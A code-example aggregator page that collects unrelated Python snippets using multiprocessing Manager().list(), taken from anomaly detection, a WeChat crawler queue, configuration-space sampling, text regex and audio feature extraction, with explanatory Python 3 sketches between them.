                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE +
                                             settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('duration', '%.2f' % time_human)
                self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340
            # Etsy's original value here was 5 seconds, which does not make the
            # skyline Analyzer very efficient for installations where 100s of
            # 1000s of metrics are being analyzed.  It led to Analyzer running
            # over the same metrics multiple times per minute and always
            # working: analysing a few 1000 metrics in 9 seconds and then doing
            # it again and again within the same minute.  The
            # ANALYZER_OPTIMUM_RUN_DURATION setting was therefore added so this
            # can self-optimise for deployments that are NOT analysing 100s of
            # 1000s of metrics, e.g. smaller, local deployments with a few 1000
            # metrics at 60 second resolution.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                # sleep_for = 60
                logger.info(
                    'sleeping for %.2f seconds due to low run time...' %
                    sleep_for)
                sleep(sleep_for)
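
The Analyzer's run loop boils down to one pattern: split the metric keys evenly across ANALYZER_PROCESSES, analyze each chunk in a multiprocessing.Process, collect results through shared structures (a Manager().list() for anomalies, Queues for exception and breakdown counts), then drain the queues with get_nowait() until Empty. A stripped-down Python 3 sketch of that fan-out/collate loop, with the real algorithm suite replaced by a toy is_anomalous check:

from math import ceil
from multiprocessing import Manager, Process, Queue
from queue import Empty

PROCESSES = 4

def is_anomalous(value):
    # Stand-in for run_selected_algorithm()
    return value % 97 == 0

def spin_process(i, items, anomalous, breakdown_q):
    # Same chunking idea as the keys_per_processor logic above
    per_proc = int(ceil(float(len(items)) / PROCESSES))
    assigned = items[(i - 1) * per_proc:min(len(items), i * per_proc)]
    for value in assigned:
        if is_anomalous(value):
            anomalous.append(value)
            breakdown_q.put(('modulo_97', 1))

if __name__ == '__main__':
    anomalous = Manager().list()
    breakdown_q = Queue()
    items = list(range(1, 1001))
    procs = [Process(target=spin_process, args=(i, items, anomalous, breakdown_q))
             for i in range(1, PROCESSES + 1)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    # Collate per-process counts, exactly like the get_nowait()/Empty loop above
    breakdown = {}
    while True:
        try:
            key, count = breakdown_q.get_nowait()
            breakdown[key] = breakdown.get(key, 0) + count
        except Empty:
            break
    print('anomalous: %d, breakdown: %s' % (len(anomalous), breakdown))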
Ejemplo n.º 51
0
class Queue_server(object):
    
    '''
    Initialize the WeChat official account queue
    @param Tuple wx_lists  list of official accounts
    '''
    def __init__(self ,wx_lists=()):
        self.__queue = Manager().Queue(-1)
        self.init_wx_lists(wx_lists)
        self.__fail_list = Manager().list()
    '''
    Initialize the WeChat official account queue
    @param Tuple wx_lists  list of official accounts
    '''
    def init_wx_lists(self ,wx_lists=()):
        for wx in wx_lists:
            self.put(wx)
    '''
    Add an element
    @param mixed value  the element to add
    '''
    def put(self ,value):
        self.__queue.put(value)
    
    '''
    Pop an element
    @return mixed
    '''
    def get(self):
        if not self.empty():
            return self.__queue.get()
        return False
    
    '''
    Get the underlying queue
    @return mixed
    '''
    def get_wx_lists_queue(self):
        return self.__queue
    
    '''
    Get the queue size
    @return int
    '''
    def get_size(self):
        return self.__queue.qsize()
    
    '''
    Whether the queue is empty
    @return bool
    '''
    def empty(self):
        return self.__queue.empty()
    
    '''
    Record a failed entry
    @param tuple wx_data  official account info
    @return bool
    '''
    def put_fail_wx(self , wx_data):
        self.__fail_list.append(wx_data)
    
    '''
    Print the failure list
    '''
    def print_fail_list(self ,flush=None):
        if len(self.__fail_list) > 0 :
            for fail in self.__fail_list:
                self.put(fail)
                print 'failed wx : {0}'.format(fail)
            if not flush:
                self.__fail_list = Manager().list()
        elif flush:
            print 'all success'
            
    # check whether any accounts failed
    def is_have_failed(self):
        # failed accounts are re-queued, so a non-empty queue means there were failures
        return not self.empty()
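
Queue_server above wraps a Manager().Queue(-1) so one queue proxy can be shared by several worker processes, with a separate Manager().list() collecting failures for a retry pass. A minimal Python 3 sketch of that producer/worker/retry pattern (the account names and the "fails if it ends in _bad" rule are purely illustrative):

from multiprocessing import Manager, Process
from queue import Empty

def worker(task_q, fail_list):
    # Drain the shared queue; record items that fail so they can be re-queued later.
    while True:
        try:
            account = task_q.get_nowait()
        except Empty:
            break
        if account.endswith('_bad'):      # stand-in for a real fetch/parse step failing
            fail_list.append(account)

if __name__ == '__main__':
    manager = Manager()
    task_q = manager.Queue(-1)
    fail_list = manager.list()
    for name in ('wx_one', 'wx_two_bad', 'wx_three'):
        task_q.put(name)
    procs = [Process(target=worker, args=(task_q, fail_list)) for _ in range(2)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    for failed in fail_list:              # retry pass: push failures back onto the queue
        task_q.put(failed)
    print('re-queued %d failed account(s)' % len(fail_list))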
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        
        
    def simpleSample(self, num):
        """randomly sample the world. save all samples"""
        samp = [];
        sampCount = 0;
        for i in range( 0, num ):
            irand_1 = randrange(0, self.mCSpace.mScaledWidth);
            irand_2 = randrange(0, self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 );
            if not self.mCollisionMgr.ifCollide( (alpha, phi) ):
                self.mFreeSamples += [(irand_1, irand_2)];
            else:
                self.mObstSamples += [(irand_1, irand_2)];
        pass;
    
    def sampleFree(self, num):
        """Sample free space only, return num samples"""
        freeSamp = [];
        freeSampCount = 0;
        while( freeSampCount < num ):
            irand_1 = randrange(0, self.mCSpace.mScaledWidth);
            irand_2 = randrange(0, self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 );
            if not self.mCollisionMgr.ifCollide( (alpha, phi) ):
                freeSamp += [(irand_1, irand_2)];
                freeSampCount += 1;
        self.mFreeSamples = freeSamp;
        print "Finished sampling free space, got {0} samples!".format( len(freeSamp) );
        return freeSamp;
    
    #def sampleNonVisArea( self, num ):
    #	"""After sampling many configurations with distance info. 
    #	There is still space not covered by those (hyper-)spheres.
    #	This method samples in the non-visiable area, and get num samples"""
    #	if len(self.mDistSamples) == 0:
    #		raise Exception( "Please sample (hyper)spheres in configuration space first." );

    #	samples = [];
    #	sampCount = 0;
    #	while( sampCount < num ):
    #		irand_1 = randrange(0, self.mCSpace.mScaledWidth);
    #		irang_2 = randrange(0, self.mCSpace.mScaledHeight);
    #		newSamp = ( irand_1, irang_2 );
    #		newSampValid = True;
    #		for distSamp in self.mDistSamples:
    #			if distSamp.isInside( (newSamp[0], newSamp[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
    #				newSampValid = False;
    #				break;
    #		if newSampValid:
    #			samples += [newSamp];
    #			sampCount += 1;

    #	return samples;

    def getARandomFreeSample(self, num):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside of any other sphere. Also, this method will not automatically 
         add the new sample to self.mDistSamples list.
         @param num: fail time. If failed to find such a sample num times, return null"""
        failTime=0;
        while( failTime < num ):
            rnd1 = randrange(0,self.mCSpace.mScaledWidth);
            rnd2 = randrange(0,self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( rnd1, rnd2 );
            if( self.mCollisionMgr.ifCollide( (alpha, phi) ) ):
                continue;

            newSamp = True;
            for sample in self.mDistSamples:
                if sample.isInside( (rnd1, rnd2), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                    newSamp = False;
                    failTime += 1
                    break;
            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd1, rnd2, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(72);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample(rnd1, rnd2, dist);
                    #(self.mDistSamples).append( newDistSamp );
                    print "failed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;

    ###=======================================================================================
    ###=== Strategy 2: Randomly sample one sphere, then sample from the boundary
    ###===         Then keep sampling the new boundary of the set of spheres
    def distSampleOneThread( self, num, imgSurface=None ):
        self.mDistSamples = [];
        boundaryQueue = Queue();
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            self.drawDistSample(imgSurface, (randFreeSamp.mSample[0],randFreeSamp.mSample[1]), randFreeSamp.mRadius);
            bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                bndSphDict[bndConfig] = randFreeSamp;
                boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

            while( not boundaryQueue.empty() ):
                #print "Size of dist samples {0}".format( len( self.mDistSamples ) );
     #           if( len(self.mDistSamples) % 100 == 0 ):
                    #randFreeSamp = self.getARandomFreeSample( num );
                    #if( randFreeSamp == None ):
                    #	return;
                    #(self.mDistSamples).append( randFreeSamp )
                    #bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                    #for bndConfig in bounds:
                    #	#if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                    #	bndSphDict[bndConfig] = newDistSamp;
                    #	boundaryQueue.put( bndConfig );				# put the boundary config to the queue.


                bnd = boundaryQueue.get();							# get a new boundary  
                newSamp = True;
                if self.mCollisionMgr.ifCollide((bnd[0], bnd[1])):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( (bnd[0], bnd[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):  # TODO: a locality-sensitive hash could speed up this containment check
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;

                if newSamp:
                    # randomly shoot rays to get the nearest distance to obstacles
                    rayShooter = RayShooter( bnd[0], bnd[1], self.mCollisionMgr, self.mCSpace );	# Shot ray
                    dist = rayShooter.randShoot(72);					# Get the distance to obstacles
                    if (dist) >= 2.0:	    					# if not too close to obstacles
                        newDistSamp = DistSample(bnd[0], bnd[1], dist)	# construct a new dist sample
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        self.drawDistSample( imgSurface, (newDistSamp.mSample[0], newDistSamp.mSample[1]), newDistSamp.mRadius );
                        bounds = newDistSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                        #for boundary in boundaryQueue:
                        #    if newDistSamp.isInside( (boundary[0],boundary[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                        #        pass;
                        for bndConfig in bounds:
                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[bndConfig] = newDistSamp;
                            boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

    def renderAllDistSamples(self, ImgSurface):
        """Render distance sample to image"""
        print "render {0} dist samples to the image".format( len(self.mDistSamples) );
        freeColor = ( 0, 0, 250 );
        obstColor = ( 200, 0, 100 );
        for samp in self.mDistSamples:
            if samp.mRadius > 0: # Free sample
                self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), freeColor );
                #pygame.draw.circle( ImgSurface, freeColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 );
            else:
                self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), obstColor );
                #pygame.draw.circle( ImgSurface, obstColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 );

    def drawDistSample(self, imgsurf, origin, radius, color=(0,0,250)):
        if(imgsurf is not None and radius <= 1000000000 and radius > 0):
                pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])), int(radius), 1 );
                if( origin[0]-radius<0 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0])+900,int(origin[1])), int(radius), 1 );
                if( origin[1]-radius<0 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])+900), int(radius), 1 );
                if( origin[0]+radius>900 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0])-900,int(origin[1])), int(radius), 1 );
                if( origin[1]+radius>900 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])-900), int(radius), 1 );

                for event in pygame.event.get():
                    pass;
                pygame.display.update();

    def writeSamplesToFile( self, filename ):
        file2write = open( filename, 'w' );
        formattedData = ""
        for vector in self.mDistSamples:
            formattedData += "{0}\t{1}\t{2}\n".format( vector.mSample[0], vector.mSample[1], vector.mRadius )
            pass
        
        file2write.write( formattedData );
        file2write.close();

    def loadDistSamplesFromFile( self, filename ):
        file2read = open( filename, 'r' );
        self.mDistSamples = [];
        for line in file2read:
            strDistSamp = line;
            info = strDistSamp.split( '\t' );
            distSamp = DistSample( float(info[0]), float(info[1]), float(info[2]));
            if( distSamp.mRadius > 2 ):
                self.mDistSamples += [ distSamp ];
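
Both SampleManager variants revolve around the same idea: keep a list of "distance samples" (a configuration plus its clearance radius, i.e. a free sphere), seed it with one random collision-free configuration, then repeatedly take boundary configurations of existing spheres and only pay for a new distance query when the boundary point is not already covered. A toy 2D Python 3 sketch of that coverage test and expansion loop, with circular obstacles standing in for the collision manager and ray shooter (all names and numbers here are illustrative):

import math
import random
from collections import deque

OBSTACLES = [((30.0, 30.0), 8.0), ((70.0, 55.0), 12.0)]   # (centre, radius) discs
WORLD = 100.0

def clearance(p):
    """Distance from p to the nearest obstacle boundary (negative if inside one)."""
    return min(math.hypot(p[0] - c[0], p[1] - c[1]) - r for c, r in OBSTACLES)

def covered(p, spheres):
    return any(math.hypot(p[0] - q[0], p[1] - q[1]) < r for q, r in spheres)

def boundary_points(p, r, n=16):
    # Points on the sphere's boundary, wrapped into the world like the original's wrap-around drawing
    return [((p[0] + r * math.cos(2 * math.pi * k / n)) % WORLD,
             (p[1] + r * math.sin(2 * math.pi * k / n)) % WORLD) for k in range(n)]

def sample_spheres(min_radius=1.0, max_spheres=200):
    spheres, frontier = [], deque()
    # Seed with one random free configuration.
    while True:
        seed = (random.uniform(0, WORLD), random.uniform(0, WORLD))
        d = clearance(seed)
        if d >= min_radius:
            break
    spheres.append((seed, d))
    frontier.extend(boundary_points(seed, d))
    while frontier and len(spheres) < max_spheres:
        p = frontier.popleft()
        if covered(p, spheres):
            continue                      # already inside an existing sphere: skip the distance query
        d = clearance(p)
        if d >= min_radius:               # skip points too close to obstacles
            spheres.append((p, d))
            frontier.extend(boundary_points(p, d))
    return spheres

print('built %d spheres' % len(sample_spheres()))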
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        unitLens = [100] * len( self.mCSpace.mMaxDimLens )
        self.mSpacePartition = SpacePartition( self.mCSpace.mMaxDimLens, unitLens );

    def getFreeSamples( self, num, dim, maxDimLens ):
        """get num number of free samples in C-Space"""
        size = 0; 
        while size < num:
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
                size += 1;

    def randomSample( self, num, dim, maxDimLens ):
        for i in range( 0, num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #config = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
            else:
                self.mObstSamples.append( rnd );
     
    def getARandomFreeSample(self, num, maxDimLens, dim):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside of any other sphere. Also, this method will not automatically 
         add the new sample to self.mDistSamples list.
         @param num: fail time. If failed to find such a sample num times, return null"""
        failTime=0;
        while( failTime < num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( self.mCollisionMgr.ifCollide( rnd ) ):
                continue;

            newSamp = True;

            grid = self.mSpacePartition.getContainingGrid( rnd );
            for sphere in grid.mContainer:
                if sphere.isInside( rnd ):
                    newSamp = False;
                    failTime += 1
                    break;

            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(50 * 2);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample( rnd, dist );
                    print "------>\tfailed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;
           

    def distSampleUsingObstSurfSamps( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.randomSample( 100, len(maxDimLens), maxDimLens );
        searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace);
        searcher.searchObstSurfConfigs( self.mFreeSamples, self.mObstSamples, 2 );

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();
        randFreeSamp = 1234;

        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, 2);
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
                bnd = boundaryQueue[0];							# get a new boundary
                del boundaryQueue[0]
                newSamp = True;
                bndUnscaled = self.mCSpace.map2UnscaledSpace( bnd );
                if self.mCollisionMgr.ifCollide( bndUnscaled ):
                    continue;

                grid = self.mSpacePartition.getContainingGrid( bnd );
                for sphere in grid.mContainer:
                    if sphere.isInside( bnd, maxDimLens ):
                        newSamp = False;
                        break;

                if newSamp:
                    # get the nearest distance to obstacles
                    dist, neighbor = searcher.getNearest( bnd );              # Get the distance to obstacles
                    if (dist) >= 30.0:	    					 # if not too close to obstacles
                        newDistSamp = DistSample(bnd, dist)	# construct a new dist sample
                        print "{0}  R: {1}".format( bnd, dist );
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        self.mSpacePartition.addSphere( newDistSamp );         ############# Add new sphere to space partition
                        #if( len(self.mDistSamples) >= 800 ):
                        #    return;
                        bounds = newDistSamp.getBoundaryConfigs(maxDimLens);		# get the boundary configs
                        for bndConfig in bounds:
                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[str(bndConfig)] = newDistSamp;
                            boundaryQueue.append( bndConfig );				# put the boundary config to the queue.
                        
                        ###########################=========================================================
                        if len(self.mDistSamples)%30 == 0:
                            print "------------ FRESH -------------"
                            idx = 0;
                            for bnd in boundaryQueue:
                                grid = self.mSpacePartition.getContainingGrid( bnd );
                                for sphere in grid.mContainer:
                                    if sphere.isInside( bnd, maxDimLens ):
                                        del boundaryQueue[idx];
                                        idx -= 1;
                                idx += 1;

                        #    for sphere in self.mDistSamples:
                        #        boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ]
                        ###########################=========================================================

                        print "\t\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue));



    def distSampleOneThread( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, len(maxDimLens) );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
                bnd = boundaryQueue[0];							# get a new boundary
                del boundaryQueue[0]
                newSamp = True;
                if self.mCollisionMgr.ifCollide( bnd ):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( bnd, maxDimLens ):  # TODO: a locality-sensitive hash could speed up this containment check
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;

                if newSamp:
                    # randomly shoot rays to get the nearest distance to obstacles
                    rayShooter = RayShooter( bnd, self.mCollisionMgr, self.mCSpace );	# Shot ray
                    dim = len(maxDimLens);
                    dist = rayShooter.randShoot(50*(dim-1));					# Get the distance to obstacles
                    if (dist) >= 40.0:	    					# if not too close to obstacles
                        newDistSamp = DistSample(bnd, dist)	# construct a new dist sample
                        print "{0}  R: {1}".format( bnd, dist );
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        bounds = newDistSamp.getBoundaryConfigs(maxDimLens);		# get the boundary configs
                        if len(self.mDistSamples) == 100:
                            return;
                        for bndConfig in bounds:
                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[str(bndConfig)] = newDistSamp;
                            boundaryQueue.append( bndConfig );				# put the boundary config to the queue.
                        
                        ###########################=========================================================
                        if len(self.mDistSamples)%100 == 0:
                            print "------------ FRESH -------------"
                            for sphere in self.mDistSamples:
                                boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ]
                        ###########################=========================================================

                        print "\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue));
                        

    def writeSamplesToFile( self, filename ):
        file2write = open( filename, 'w' );
        formattedData = ""
        for vector in self.mDistSamples:
            for i in range( 0, len(vector.mSample) ):
                formattedData += str( vector.mSample[i] ) + "\t";
            formattedData += str(vector.mRadius);
            formattedData += "\n";
            pass
        
        file2write.write( formattedData );
        file2write.close();

    def loadDistSamplesFromFile( self, filename ):
        file2read = open( filename, 'r' );
        self.mDistSamples = [];
        lineNum = 0;
        for line in file2read:
            if( lineNum % 100 == 0 ):
                print "Reading line: {0}".format( lineNum );
            lineNum += 1;
            strDistSamp = line;
            info = strDistSamp.split( '\t' );
            dim = len(info);
            pos = [0] * (dim-1);
            for i in range(0,dim-1):
                pos[i] = float( info[i] );
            radius = float(info[dim-1]);
            distSamp = DistSample(tuple(pos), radius);
            if( distSamp.mRadius >= 2 ):
                self.mDistSamples += [ distSamp ];
                self.mSpacePartition.addSphere( distSamp );

    def renderDistSamples(self, imgSurf):
        for samp in self.mDistSamples:
            samp.render( imgSurf, (0,250,0) );
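
The second variant avoids the linear scan over self.mDistSamples by bucketing spheres into a uniform grid (SpacePartition) and testing only the spheres registered in the cell that contains the query point. A minimal Python 3 sketch of such a grid index (illustrative only, not the project's SpacePartition; here a sphere is registered in every cell its bounding box touches):

import math
from collections import defaultdict

class GridIndex:
    """Bucket spheres into uniform cells so point-in-sphere queries stay local."""
    def __init__(self, cell_size=100.0):
        self.cell_size = cell_size
        self.cells = defaultdict(list)   # (ix, iy) -> [(centre, radius), ...]

    def _cell(self, p):
        return (int(p[0] // self.cell_size), int(p[1] // self.cell_size))

    def add_sphere(self, centre, radius):
        # Register the sphere in every cell its bounding box touches.
        x0, y0 = self._cell((centre[0] - radius, centre[1] - radius))
        x1, y1 = self._cell((centre[0] + radius, centre[1] + radius))
        for ix in range(x0, x1 + 1):
            for iy in range(y0, y1 + 1):
                self.cells[(ix, iy)].append((centre, radius))

    def covered(self, p):
        # Only the spheres in p's own cell are checked, not the whole sample set.
        for centre, radius in self.cells[self._cell(p)]:
            if math.hypot(p[0] - centre[0], p[1] - centre[1]) < radius:
                return True
        return False

index = GridIndex()
index.add_sphere((120.0, 80.0), 30.0)
print(index.covered((130.0, 90.0)), index.covered((500.0, 500.0)))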
Ejemplo n.º 54
0
Archivo: test.py Proyecto: gugug/git
    return t1, t2, t3


t = tt()
print t
print 'posts', t[2]
z = zip(t[0], t[1], t[2])
print len(z)
for i in range(len(z)):
    print z[i]
import re
from multiprocessing import Process, Manager

l = Manager().list()
d = {1: 1, 2: 2, 3: 3, 4: 4}
l.append(d)
print l

j = 'id 1749990115 博文id M_DwImDw3ct 博文 【悲催!男子欲滑翔求婚 不想挂树上了[笑cry]】21日,湖北宜昌一男子乘坐滑翔伞在空中向女朋友求婚。但在降落时,因一阵强风被刮到树上,被挂近一小时,最后请来吊车救援。辛苦下树的男子手抱花束,来到女友面前求婚。但女友没有答应转身离去……网友:天公不作美,求婚现场成事故现场[doge](三峡晚报&nbsp;全文'
topic_patterns = re.compile('【.*?】')
topic = topic_patterns.findall(j)
if len(topic) > 0:
    print topic[0]
    topic_clean_pattern = re.compile('(\[.*?])')
    topic = re.sub(topic_clean_pattern, '', topic[0])
    topic_clean2_pattern = re.compile('#(.*?)#')
    topic = re.sub(topic_clean2_pattern, '', topic)

print topic
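
One caveat about the Manager().list() usage above: appending the dict stores a pickled copy in the manager process, so later mutations of the local dict, or of the temporary copy returned by l[0], are not written back automatically; you have to reassign through the proxy. A small Python 3 sketch of the gotcha and the workaround:

from multiprocessing import Manager

if __name__ == '__main__':
    l = Manager().list()
    d = {1: 1, 2: 2}
    l.append(d)

    d[3] = 3                 # mutates only the local dict, not the managed copy
    l[0][4] = 4              # mutates a temporary copy returned by the proxy
    print(l[0])              # still {1: 1, 2: 2}

    item = l[0]
    item[3] = 3
    l[0] = item              # reassigning through the proxy persists the change
    print(l[0])              # {1: 1, 2: 2, 3: 3}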

Ejemplo n.º 55
0
def extractFeatures(src_dir, base_dir='extracted_features', dataset='us', aug_type='origin', save=False):
	if base_dir == '':
		base_dir = path.split(path.abspath(src_dir))[0]
	n_cores = 20

	feat_type = 'logmelspec10000'
	sr = 44100
	win_size = [1024, 4096, 16384]
	hop_size = 512
	n_mels = 128
	
	dir_name = '{}.{}_{}_{}'.format(feat_type, sr, hop_size, n_mels)
	for ws in win_size:
		dir_name += '.' + str(int(ws/1024))
	# feat_dir = path.join('data/feature', 
	# 					 dir_name,
	# 					 base_dir)
	
	fp_dict = {}
	fp_list = []
	for root, dirs, files in os.walk(src_dir):
		if files:
			nof = 0
			for in_fn in files:
				if isAudioFile(in_fn, dataset):
					in_fp = path.join(root, in_fn)
					fn, tn = getFileInfo(in_fp, dataset)
					if fn in fp_dict:
						fp_dict[fn][-1][tn] = 1
					else:
						target = np.zeros(NUM_TAG, dtype=int)
						target[tn] = 1
						fp_dict[fn] = (in_fp, fn, target)
					# fp_list.append(in_fp)
					nof += 1
			print('{} files in {}'.format(nof, root))
	print('We got totally {} clips.'.format(len(fp_dict.keys())))

	num_stat = np.zeros(NUM_TAG, dtype=int)
	for _p, _n, tags in fp_dict.values():
		num_stat[np.sum(tags)-1] += 1
	print('Number of clips according to each number of tags:')
	for i in range(NUM_TAG):
		print('tags: {}, clips: {}'.format(i, num_stat[i]))

	all_feat = Manager().list()
	test_file_list = Manager().list()
	lock = Lock()
	func = _func_tag_label

	for root, dirs, files in os.walk(out_dir):  # out_dir (the existing-feature directory) is assumed to be defined elsewhere in the original script
		for _fn in files:
			fn = _fn.replace('.npy', '')
			all_feat.append(fn)

	# for f in all_feat:
	# 	if f in fp_dict:
	# 		del fp_dict[f]
	# print('{} clips left.'.format(len(fp_dict.keys())))
	# for f in fp_dict:
	# 	print(f)
	# return

	pool = Pool(processes=n_cores, 
				initializer=initProcess, 
				initargs=(dataset, all_feat, lock, sr, 
						  win_size, hop_size, n_mels, aug_type))
	result = pool.map(func, fp_dict.values())
	pool.close()
	pool.join()
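
extractFeatures shares the Manager().list() proxies and a Lock with its Pool workers through the initializer/initargs hook, which stashes them in module-level globals inside each worker process. A minimal Python 3 sketch of that pattern (the function and variable names here are illustrative, not the project's own):

from multiprocessing import Manager, Pool, Lock

_shared = {}

def init_worker(result_list, lock):
    # Runs once in each worker process; keep the shared proxies in module globals.
    _shared['results'] = result_list
    _shared['lock'] = lock

def process_item(item):
    feature = item * item            # stand-in for the real feature extraction
    with _shared['lock']:            # serialize access while appending
        _shared['results'].append((item, feature))
    return item

if __name__ == '__main__':
    manager = Manager()
    results = manager.list()
    lock = Lock()
    with Pool(processes=4, initializer=init_worker, initargs=(results, lock)) as pool:
        pool.map(process_item, range(10))
    print(sorted(results[:]))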